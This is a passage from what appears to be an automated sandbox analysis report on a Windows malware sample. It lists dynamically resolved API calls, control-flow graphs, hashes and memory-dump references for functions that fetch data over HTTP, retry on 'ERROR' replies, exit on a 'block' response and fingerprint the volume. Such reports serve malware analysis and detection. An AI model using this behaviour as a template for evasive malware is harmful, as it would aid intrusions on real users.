                      • GetProcAddress.KERNEL32(74DD0000,0108D1C8), ref: 003E9ED6
                      • GetProcAddress.KERNEL32(74DD0000,0108D0F0), ref: 003E9EEF
                      • GetProcAddress.KERNEL32(74DD0000,0108D180), ref: 003E9F07
                      • GetProcAddress.KERNEL32(74DD0000,0108D390), ref: 003E9F1F
                      • GetProcAddress.KERNEL32(74DD0000,0108D2E8), ref: 003E9F38
                      • GetProcAddress.KERNEL32(74DD0000,0108A2E0), ref: 003E9F50
                      • GetProcAddress.KERNEL32(74DD0000,0108D300), ref: 003E9F68
                      • GetProcAddress.KERNEL32(74DD0000,0108D2A0), ref: 003E9F81
                      • GetProcAddress.KERNEL32(74DD0000,01075830), ref: 003E9F99
                      • GetProcAddress.KERNEL32(74DD0000,0108D198), ref: 003E9FB1
                      • GetProcAddress.KERNEL32(74DD0000,01075510), ref: 003E9FCA
                      • GetProcAddress.KERNEL32(74DD0000,0108D0D8), ref: 003E9FE2
                      • GetProcAddress.KERNEL32(74DD0000,0108D108), ref: 003E9FFA
                      • GetProcAddress.KERNEL32(74DD0000,01075490), ref: 003EA013
                      • GetProcAddress.KERNEL32(74DD0000,01075390), ref: 003EA02B
                      • LoadLibraryA.KERNEL32(0108D318,?,003E5CA3,003F0AEB,?,?,?,?,?,?,?,?,?,?,003F0AEA,003F0AE3), ref: 003EA03D
                      • LoadLibraryA.KERNEL32(0108D330,?,003E5CA3,003F0AEB,?,?,?,?,?,?,?,?,?,?,003F0AEA,003F0AE3), ref: 003EA04E
                      • LoadLibraryA.KERNEL32(0108D120,?,003E5CA3,003F0AEB,?,?,?,?,?,?,?,?,?,?,003F0AEA,003F0AE3), ref: 003EA060
                      • LoadLibraryA.KERNEL32(0108D1E0,?,003E5CA3,003F0AEB,?,?,?,?,?,?,?,?,?,?,003F0AEA,003F0AE3), ref: 003EA072
                      • LoadLibraryA.KERNEL32(0108D150,?,003E5CA3,003F0AEB,?,?,?,?,?,?,?,?,?,?,003F0AEA,003F0AE3), ref: 003EA083
                      • LoadLibraryA.KERNEL32(0108D168,?,003E5CA3,003F0AEB,?,?,?,?,?,?,?,?,?,?,003F0AEA,003F0AE3), ref: 003EA095
                      • LoadLibraryA.KERNEL32(0108D1F8,?,003E5CA3,003F0AEB,?,?,?,?,?,?,?,?,?,?,003F0AEA,003F0AE3), ref: 003EA0A7
                      • LoadLibraryA.KERNEL32(0108D240,?,003E5CA3,003F0AEB,?,?,?,?,?,?,?,?,?,?,003F0AEA,003F0AE3), ref: 003EA0B8
                      • GetProcAddress.KERNEL32(75290000,010754B0), ref: 003EA0DA
                      • GetProcAddress.KERNEL32(75290000,0108D4E0), ref: 003EA0F2
                      • GetProcAddress.KERNEL32(75290000,01088F40), ref: 003EA10A
                      • GetProcAddress.KERNEL32(75290000,0108D480), ref: 003EA123
                      • GetProcAddress.KERNEL32(75290000,010754F0), ref: 003EA13B
                      • GetProcAddress.KERNEL32(734C0000,0107BB38), ref: 003EA160
                      • GetProcAddress.KERNEL32(734C0000,010755F0), ref: 003EA179
                      • GetProcAddress.KERNEL32(734C0000,0107BA98), ref: 003EA191
                      • GetProcAddress.KERNEL32(734C0000,0108D408), ref: 003EA1A9
                      • GetProcAddress.KERNEL32(734C0000,0108D540), ref: 003EA1C2
                      • GetProcAddress.KERNEL32(734C0000,01075430), ref: 003EA1DA
                      • GetProcAddress.KERNEL32(734C0000,01075530), ref: 003EA1F2
                      • GetProcAddress.KERNEL32(734C0000,0108D570), ref: 003EA20B
                      • GetProcAddress.KERNEL32(752C0000,010753B0), ref: 003EA22C
                      • GetProcAddress.KERNEL32(752C0000,010754D0), ref: 003EA244
                      • GetProcAddress.KERNEL32(752C0000,0108D4F8), ref: 003EA25D
                      • GetProcAddress.KERNEL32(752C0000,0108D420), ref: 003EA275
                      • GetProcAddress.KERNEL32(752C0000,01075410), ref: 003EA28D
                      • GetProcAddress.KERNEL32(74EC0000,0107B778), ref: 003EA2B3
                      • GetProcAddress.KERNEL32(74EC0000,0107B980), ref: 003EA2CB
                      • GetProcAddress.KERNEL32(74EC0000,0108D588), ref: 003EA2E3
                      • GetProcAddress.KERNEL32(74EC0000,01075550), ref: 003EA2FC
                      • GetProcAddress.KERNEL32(74EC0000,01075570), ref: 003EA314
                      • GetProcAddress.KERNEL32(74EC0000,0107B840), ref: 003EA32C
                      • GetProcAddress.KERNEL32(75BD0000,0108D468), ref: 003EA352
                      • GetProcAddress.KERNEL32(75BD0000,01075330), ref: 003EA36A
                      • GetProcAddress.KERNEL32(75BD0000,01088E80), ref: 003EA382
                      • GetProcAddress.KERNEL32(75BD0000,0108D438), ref: 003EA39B
                      • GetProcAddress.KERNEL32(75BD0000,0108D450), ref: 003EA3B3
                      • GetProcAddress.KERNEL32(75BD0000,01075590), ref: 003EA3CB
                      • GetProcAddress.KERNEL32(75BD0000,010755B0), ref: 003EA3E4
                      • GetProcAddress.KERNEL32(75BD0000,0108D528), ref: 003EA3FC
                      • GetProcAddress.KERNEL32(75BD0000,0108D558), ref: 003EA414
                      • GetProcAddress.KERNEL32(75A70000,010755D0), ref: 003EA436
                      • GetProcAddress.KERNEL32(75A70000,0108D3D8), ref: 003EA44E
                      • GetProcAddress.KERNEL32(75A70000,0108D3F0), ref: 003EA466
                      • GetProcAddress.KERNEL32(75A70000,0108D498), ref: 003EA47F
                      • GetProcAddress.KERNEL32(75A70000,0108D510), ref: 003EA497
                      • GetProcAddress.KERNEL32(75450000,01075210), ref: 003EA4B8
                      • GetProcAddress.KERNEL32(75450000,01075450), ref: 003EA4D1
                      • GetProcAddress.KERNEL32(75DA0000,01075290), ref: 003EA4F2
                      • GetProcAddress.KERNEL32(75DA0000,0108D4B0), ref: 003EA50A
                      • GetProcAddress.KERNEL32(6F040000,01075370), ref: 003EA530
                      • GetProcAddress.KERNEL32(6F040000,010753D0), ref: 003EA548
                      • GetProcAddress.KERNEL32(6F040000,01075230), ref: 003EA560
                      • GetProcAddress.KERNEL32(6F040000,0108D4C8), ref: 003EA579
                      • GetProcAddress.KERNEL32(6F040000,01075250), ref: 003EA591
                      • GetProcAddress.KERNEL32(6F040000,01075270), ref: 003EA5A9
                      • GetProcAddress.KERNEL32(6F040000,010753F0), ref: 003EA5C2
                      • GetProcAddress.KERNEL32(6F040000,01075470), ref: 003EA5DA
                      • GetProcAddress.KERNEL32(6F040000,InternetSetOptionA), ref: 003EA5F1
                      • GetProcAddress.KERNEL32(6F040000,HttpQueryInfoA), ref: 003EA607
                      • GetProcAddress.KERNEL32(75AF0000,0108CF58), ref: 003EA629
                      • GetProcAddress.KERNEL32(75AF0000,01088EF0), ref: 003EA641
                      • GetProcAddress.KERNEL32(75AF0000,0108D000), ref: 003EA659
                      • GetProcAddress.KERNEL32(75AF0000,0108CEB0), ref: 003EA672
                      • GetProcAddress.KERNEL32(75D90000,010752B0), ref: 003EA693
                      • GetProcAddress.KERNEL32(6CFB0000,0108CFD0), ref: 003EA6B4
                      • GetProcAddress.KERNEL32(6CFB0000,01075350), ref: 003EA6CD
                      • GetProcAddress.KERNEL32(6CFB0000,0108CE80), ref: 003EA6E5
                      • GetProcAddress.KERNEL32(6CFB0000,0108CF40), ref: 003EA6FD
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AddressProc$LibraryLoad
                      • String ID: HttpQueryInfoA$InternetSetOptionA
                      • API String ID: 2238633743-1775429166
                      • Opcode ID: ef3d62f91da5be2996486a1abc11de448c9c48b81139caa4c90847bfbaa2cb17
                      • Instruction ID: dbc211897df2eabf37a169bce09328509da3d26f3c3d4174fe4ffda52001786d
                      • Opcode Fuzzy Hash: ef3d62f91da5be2996486a1abc11de448c9c48b81139caa4c90847bfbaa2cb17
                      • Instruction Fuzzy Hash: 3C624DB9502200AFC385DFE9ED889E637FBF74C31131CE61BA609C32A5D6399542DB52
                      Function 003D6280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1033 3d6280-3d630b call 3ea7a0 call 3d47b0 call 3ea740 InternetOpenA StrCmpCA 1040 3d630d 1033->1040 1041 3d6314-3d6318 1033->1041 1040->1041 1042 3d631e-3d6342 InternetConnectA 1041->1042 1043 3d6509-3d6525 call 3ea7a0 call 3ea800 * 2 1041->1043 1045 3d64ff-3d6503 InternetCloseHandle 1042->1045 1046 3d6348-3d634c 1042->1046 1062 3d6528-3d652d 1043->1062 1045->1043 1048 3d634e-3d6358 1046->1048 1049 3d635a 1046->1049 1051 3d6364-3d6392 HttpOpenRequestA 1048->1051 1049->1051 1053 3d6398-3d639c 1051->1053 1054 3d64f5-3d64f9 InternetCloseHandle 1051->1054 1056 3d639e-3d63bf InternetSetOptionA 1053->1056 1057 3d63c5-3d6405 HttpSendRequestA HttpQueryInfoA 1053->1057 1054->1045 1056->1057 1059 3d642c-3d644b call 3e8940 1057->1059 1060 3d6407-3d6427 call 3ea740 call 3ea800 * 2 1057->1060 1067 3d644d-3d6454 1059->1067 1068 3d64c9-3d64e9 call 3ea740 call 3ea800 * 2 1059->1068 1060->1062 1071 3d64c7-3d64ef InternetCloseHandle 1067->1071 1072 3d6456-3d6480 InternetReadFile 1067->1072 1068->1062 1071->1054 1076 3d648b 1072->1076 1077 3d6482-3d6489 1072->1077 1076->1071 1077->1076 1080 3d648d-3d64c5 call 3ea9b0 call 3ea8a0 call 3ea800 1077->1080 1080->1072
                      APIs
                        • Part of subcall function 003EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003EA7E6
                        • Part of subcall function 003D47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 003D4839
                        • Part of subcall function 003D47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 003D4849
                        • Part of subcall function 003EA740: lstrcpy.KERNEL32(003F0E17,00000000), ref: 003EA788
                      • InternetOpenA.WININET(003F0DFE,00000001,00000000,00000000,00000000), ref: 003D62E1
                      • StrCmpCA.SHLWAPI(?,0108E978), ref: 003D6303
                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 003D6335
                      • HttpOpenRequestA.WININET(00000000,GET,?,0108E0E8,00000000,00000000,00400100,00000000), ref: 003D6385
                      • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 003D63BF
                      • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003D63D1
                      • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 003D63FD
                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 003D646D
                      • InternetCloseHandle.WININET(00000000), ref: 003D64EF
                      • InternetCloseHandle.WININET(00000000), ref: 003D64F9
                      • InternetCloseHandle.WININET(00000000), ref: 003D6503
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                      • String ID: ERROR$ERROR$GET
                      • API String ID: 3749127164-2509457195
                      • Opcode ID: 673a3262c6109ffbc01912da29a61f2016142115e2933e77c2717a1d02928983
                      • Instruction ID: 7e8df21e1726f957dd3cc99bd7417c2bf948175bcfd91b989765801f7e8de2bd
                      • Opcode Fuzzy Hash: 673a3262c6109ffbc01912da29a61f2016142115e2933e77c2717a1d02928983
                      • Instruction Fuzzy Hash: 77717E71A00218EBDB25DFE1DC4ABEE7779BB44700F108199F10A6B2D4DBB46A85CF51
                      Function 003E5510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1090 3e5510-3e5577 call 3e5ad0 call 3ea820 * 3 call 3ea740 * 4 1106 3e557c-3e5583 1090->1106 1107 3e55d7-3e564c call 3ea740 * 2 call 3d1590 call 3e52c0 call 3ea8a0 call 3ea800 call 3eaad0 StrCmpCA 1106->1107 1108 3e5585-3e55b6 call 3ea820 call 3ea7a0 call 3d1590 call 3e51f0 1106->1108 1133 3e5693-3e56a9 call 3eaad0 StrCmpCA 1107->1133 1138 3e564e-3e568e call 3ea7a0 call 3d1590 call 3e51f0 call 3ea8a0 call 3ea800 1107->1138 1124 3e55bb-3e55d2 call 3ea8a0 call 3ea800 1108->1124 1124->1133 1140 3e56af-3e56b6 1133->1140 1141 3e57dc-3e5844 call 3ea8a0 call 3ea820 * 2 call 3d1670 call 3ea800 * 4 call 3e6560 call 3d1550 1133->1141 1138->1133 1144 3e56bc-3e56c3 1140->1144 1145 3e57da-3e585f call 3eaad0 StrCmpCA 1140->1145 1270 3e5ac3-3e5ac6 1141->1270 1149 3e571e-3e5793 call 3ea740 * 2 call 3d1590 call 3e52c0 call 3ea8a0 call 3ea800 call 3eaad0 StrCmpCA 1144->1149 1150 3e56c5-3e5719 call 3ea820 call 3ea7a0 call 3d1590 call 3e51f0 call 3ea8a0 call 3ea800 1144->1150 1164 3e5865-3e586c 1145->1164 1165 3e5991-3e59f9 call 3ea8a0 call 3ea820 * 2 call 3d1670 call 3ea800 * 4 call 3e6560 call 3d1550 1145->1165 1149->1145 1250 3e5795-3e57d5 call 3ea7a0 call 3d1590 call 3e51f0 call 3ea8a0 call 3ea800 1149->1250 1150->1145 1171 3e598f-3e5a14 call 3eaad0 StrCmpCA 1164->1171 1172 3e5872-3e5879 1164->1172 1165->1270 1201 3e5a28-3e5a91 call 3ea8a0 call 3ea820 * 2 call 3d1670 call 3ea800 * 4 call 3e6560 call 3d1550 1171->1201 1202 3e5a16-3e5a21 Sleep 1171->1202 1180 3e587b-3e58ce call 3ea820 call 3ea7a0 call 3d1590 call 3e51f0 call 3ea8a0 call 3ea800 1172->1180 1181 3e58d3-3e5948 call 3ea740 * 2 call 3d1590 call 3e52c0 call 3ea8a0 call 3ea800 call 3eaad0 StrCmpCA 1172->1181 1180->1171 1181->1171 1275 3e594a-3e598a call 3ea7a0 call 3d1590 call 3e51f0 call 3ea8a0 call 3ea800 1181->1275 1201->1270 1202->1106 1250->1145 1275->1171
                      APIs
                        • Part of subcall function 003EA820: lstrlen.KERNEL32(003D4F05,?,?,003D4F05,003F0DDE), ref: 003EA82B
                        • Part of subcall function 003EA820: lstrcpy.KERNEL32(003F0DDE,00000000), ref: 003EA885
                        • Part of subcall function 003EA740: lstrcpy.KERNEL32(003F0E17,00000000), ref: 003EA788
                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 003E5644
                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 003E56A1
                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 003E5857
                        • Part of subcall function 003EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003EA7E6
                        • Part of subcall function 003E51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 003E5228
                        • Part of subcall function 003EA8A0: lstrcpy.KERNEL32(?,003F0E17), ref: 003EA905
                        • Part of subcall function 003E52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 003E5318
                        • Part of subcall function 003E52C0: lstrlen.KERNEL32(00000000), ref: 003E532F
                        • Part of subcall function 003E52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 003E5364
                        • Part of subcall function 003E52C0: lstrlen.KERNEL32(00000000), ref: 003E5383
                        • Part of subcall function 003E52C0: lstrlen.KERNEL32(00000000), ref: 003E53AE
                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 003E578B
                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 003E5940
                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 003E5A0C
                      • Sleep.KERNEL32(0000EA60), ref: 003E5A1B
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpylstrlen$Sleep
                      • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                      • API String ID: 507064821-2791005934
                      • Opcode ID: 7a4d1a6a9786bba150cdda29be91156132fd9a255e5c468635e6b027b32184ca
                      • Instruction ID: c5408be3a75b74d71798e5dcb94141594977423d09f26e077b581c2b87a8ad44
                      • Opcode Fuzzy Hash: 7a4d1a6a9786bba150cdda29be91156132fd9a255e5c468635e6b027b32184ca
                      • Instruction Fuzzy Hash: 9EE164729106549ADB06FBE1EC92AFD7739AF54300F408329B5066A1D1EF347F09CBA2
                      Function 003E17A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1301 3e17a0-3e17cd call 3eaad0 StrCmpCA 1304 3e17cf-3e17d1 ExitProcess 1301->1304 1305 3e17d7-3e17f1 call 3eaad0 1301->1305 1309 3e17f4-3e17f8 1305->1309 1310 3e17fe-3e1811 1309->1310 1311 3e19c2-3e19cd call 3ea800 1309->1311 1313 3e199e-3e19bd 1310->1313 1314 3e1817-3e181a 1310->1314 1313->1309 1315 3e187f-3e1890 StrCmpCA 1314->1315 1316 3e185d-3e186e StrCmpCA 1314->1316 1317 3e1835-3e1844 call 3ea820 1314->1317 1318 3e1932-3e1943 StrCmpCA 1314->1318 1319 3e1913-3e1924 StrCmpCA 1314->1319 1320 3e1970-3e1981 StrCmpCA 1314->1320 1321 3e18f1-3e1902 StrCmpCA 1314->1321 1322 3e1951-3e1962 StrCmpCA 1314->1322 1323 3e18cf-3e18e0 StrCmpCA 1314->1323 1324 3e198f-3e1999 call 3ea820 1314->1324 1325 3e18ad-3e18be StrCmpCA 1314->1325 1326 3e1849-3e1858 call 3ea820 1314->1326 1327 3e1821-3e1830 call 3ea820 1314->1327 1340 3e189e-3e18a1 1315->1340 1341 3e1892-3e189c 1315->1341 1338 3e187a 1316->1338 1339 3e1870-3e1873 1316->1339 1317->1313 1350 3e194f 1318->1350 1351 3e1945-3e1948 1318->1351 1348 3e1926-3e1929 1319->1348 1349 3e1930 1319->1349 1332 3e198d 1320->1332 1333 3e1983-3e1986 1320->1333 1346 3e190e 1321->1346 1347 3e1904-3e1907 1321->1347 1329 3e196e 1322->1329 1330 3e1964-3e1967 1322->1330 1344 3e18ec 1323->1344 1345 3e18e2-3e18e5 1323->1345 1324->1313 1342 3e18ca 1325->1342 1343 3e18c0-3e18c3 1325->1343 1326->1313 1327->1313 1329->1313 1330->1329 1332->1313 1333->1332 1338->1313 1339->1338 1355 3e18a8 1340->1355 1341->1355 1342->1313 1343->1342 1344->1313 1345->1344 1346->1313 1347->1346 1348->1349 1349->1313 1350->1313 1351->1350 1355->1313
                      APIs
                      • StrCmpCA.SHLWAPI(00000000,block), ref: 003E17C5
                      • ExitProcess.KERNEL32 ref: 003E17D1
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExitProcess
                      • String ID: block
                      • API String ID: 621844428-2199623458
                      • Opcode ID: 0bd4e393bd3fda1246c5632d1e4e7f39045c023178c08720ffe1ec5669f75b74
                      • Instruction ID: 362610252bb1460a2cd29423a9cb61ecf8d5619cdbaf79c77e292d2017f1ef88
                      • Opcode Fuzzy Hash: 0bd4e393bd3fda1246c5632d1e4e7f39045c023178c08720ffe1ec5669f75b74
                      • Instruction Fuzzy Hash: B8516EB4A00259EFCB06DFA6D954AFE77B9BF44704F108149F506AB381D770E941CBA2
                      Function 003E7500 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 106memoryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1356 3e7500-3e754a GetWindowsDirectoryA 1357 3e754c 1356->1357 1358 3e7553-3e75c7 GetVolumeInformationA call 3e8d00 * 3 1356->1358 1357->1358 1365 3e75d8-3e75df 1358->1365 1366 3e75fc-3e7617 GetProcessHeap RtlAllocateHeap 1365->1366 1367 3e75e1-3e75fa call 3e8d00 1365->1367 1369 3e7628-3e7658 wsprintfA call 3ea740 1366->1369 1370 3e7619-3e7626 call 3ea740 1366->1370 1367->1365 1377 3e767e-3e768e 1369->1377 1370->1377
                      APIs
                      • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 003E7542
                      • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 003E757F
                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 003E7603
                      • RtlAllocateHeap.NTDLL(00000000), ref: 003E760A
                      • wsprintfA.USER32 ref: 003E7640
                        • Part of subcall function 003EA740: lstrcpy.KERNEL32(003F0E17,00000000), ref: 003EA788
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                      • String ID: :$C$\$?
                      • API String ID: 1544550907-608478882
                      • Opcode ID: e483dc61e62031550d909f8a95b560ffbd532b89e51bb44fed826c57af8a0f9d
                      • Instruction ID: 3b497be3b4951ba598423d35fe8d29e152fbc0b83efb33688fc803d4a8ce1259
                      • Opcode Fuzzy Hash: e483dc61e62031550d909f8a95b560ffbd532b89e51bb44fed826c57af8a0f9d
